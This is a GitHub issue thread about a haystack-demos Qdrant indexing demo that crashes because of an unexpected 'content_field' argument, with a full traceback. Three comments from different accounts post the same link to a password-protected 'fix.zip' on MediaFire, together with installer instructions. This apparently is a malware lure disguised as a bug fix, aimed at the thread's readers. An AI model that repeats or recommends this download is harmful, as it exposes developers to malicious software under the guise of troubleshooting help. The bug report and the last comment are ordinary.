### ISSUE TITLE
demo qdrant_indexing: unexpected keyword argument 'content_field'

### ISSUE THREAD

**Issue by crNewton** [deepset-ai/haystack-demos#28]
The default demo doesn't work (following the [demo readme](https://github.com/deepset-ai/haystack-demos/blob/main/qdrant_indexing/README.md)).
It's struggling with "content_field" from the retriever. 
I tried various deepset/haystack:base base versions, but did not fix it. 

```
hayhooks  | INFO:     Pipelines dir set to: /pipelines
hayhooks  | Traceback (most recent call last):
hayhooks  |   File "/opt/venv/bin/hayhooks", line 8, in <module>
hayhooks  |     sys.exit(hayhooks())
hayhooks  |              ^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/click/core.py", line 1157, in __call__
hayhooks  |     return self.main(*args, **kwargs)
hayhooks  |            ^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/click/core.py", line 1078, in main
hayhooks  |     rv = self.invoke(ctx)
hayhooks  |          ^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/click/core.py", line 1688, in invoke
hayhooks  |     return _process_result(sub_ctx.command.invoke(sub_ctx))
hayhooks  |                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/click/core.py", line 1434, in invoke
hayhooks  |     return ctx.invoke(self.callback, **ctx.params)
hayhooks  |            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/click/core.py", line 783, in invoke
hayhooks  |     return __callback(*args, **kwargs)
hayhooks  |            ^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/hayhooks/cli/run/__init__.py", line 20, in run
hayhooks  |     uvicorn.run("hayhooks.server:app", host=host, port=port)
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/uvicorn/main.py", line 577, in run
hayhooks  |     server.run()
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/uvicorn/server.py", line 65, in run
hayhooks  |     return asyncio.run(self.serve(sockets=sockets))
hayhooks  |            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/usr/local/lib/python3.12/asyncio/runners.py", line 194, in run
hayhooks  |     return runner.run(main)
hayhooks  |            ^^^^^^^^^^^^^^^^
hayhooks  |   File "/usr/local/lib/python3.12/asyncio/runners.py", line 118, in run
hayhooks  |     return self._loop.run_until_complete(task)
hayhooks  |            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/usr/local/lib/python3.12/asyncio/base_events.py", line 687, in run_until_complete
hayhooks  |     return future.result()
hayhooks  |            ^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/uvicorn/server.py", line 69, in serve
hayhooks  |     await self._serve(sockets)
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/uvicorn/server.py", line 76, in _serve
hayhooks  |     config.load()
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/uvicorn/config.py", line 434, in load
hayhooks  |     self.loaded_app = import_from_string(self.app)
hayhooks  |                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/uvicorn/importer.py", line 19, in import_from_string
hayhooks  |     module = importlib.import_module(module_str)
hayhooks  |              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/usr/local/lib/python3.12/importlib/__init__.py", line 90, in import_module
hayhooks  |     return _bootstrap._gcd_import(name[level:], package, level)
hayhooks  |            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "<frozen importlib._bootstrap>", line 1387, in _gcd_import
hayhooks  |   File "<frozen importlib._bootstrap>", line 1360, in _find_and_load
hayhooks  |   File "<frozen importlib._bootstrap>", line 1331, in _find_and_load_unlocked
hayhooks  |   File "<frozen importlib._bootstrap>", line 935, in _load_unlocked
hayhooks  |   File "<frozen importlib._bootstrap_external>", line 995, in exec_module
hayhooks  |   File "<frozen importlib._bootstrap>", line 488, in _call_with_frames_removed
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/hayhooks/server/__init__.py", line 1, in <module>
hayhooks  |     from hayhooks.server.app import app
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/hayhooks/server/app.py", line 32, in <module>
hayhooks  |     app = create_app()
hayhooks  |           ^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/hayhooks/server/app.py", line 27, in create_app
hayhooks  |     deployed_pipeline = deploy_pipeline_def(app, pipeline_defintion)
hayhooks  |                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/hayhooks/server/utils/deploy_utils.py", line 16, in deploy_pipeline_def
hayhooks  |     pipe = registry.add(pipeline_def.name, pipeline_def.source_code)
hayhooks  |            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/hayhooks/server/pipelines/registry.py", line 17, in add
hayhooks  |     self._pipelines[name] = Pipeline.loads(source)
hayhooks  |                             ^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/haystack/core/pipeline/pipeline.py", line 234, in loads
hayhooks  |     return cls.from_dict(marshaller.unmarshal(data), callbacks)
hayhooks  |            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/haystack/core/pipeline/pipeline.py", line 181, in from_dict
hayhooks  |     instance = component_from_dict(component_class, component_data, name, callbacks)
hayhooks  |                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/haystack/core/serialization.py", line 116, in component_from_dict
hayhooks  |     return do_from_dict()
hayhooks  |            ^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/haystack/core/serialization.py", line 111, in do_from_dict
hayhooks  |     return cls.from_dict(data)
hayhooks  |            ^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/haystack/components/writers/document_writer.py", line 88, in from_dict
hayhooks  |     docstore = docstore_class.from_dict(init_params["document_store"])
hayhooks  |                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/haystack_integrations/document_stores/qdrant/document_store.py", line 416, in from_dict
hayhooks  |     return default_from_dict(cls, data)
hayhooks  |            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
hayhooks  |   File "/opt/venv/lib/python3.12/site-packages/haystack/core/serialization.py", line 190, in default_from_dict
hayhooks  |     return cls(**init_params)
hayhooks  |            ^^^^^^^^^^^^^^^^^^
hayhooks  | TypeError: QdrantDocumentStore.__init__() got an unexpected keyword argument 'content_field'
```

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lvenga** [comment]
Facing the same error...
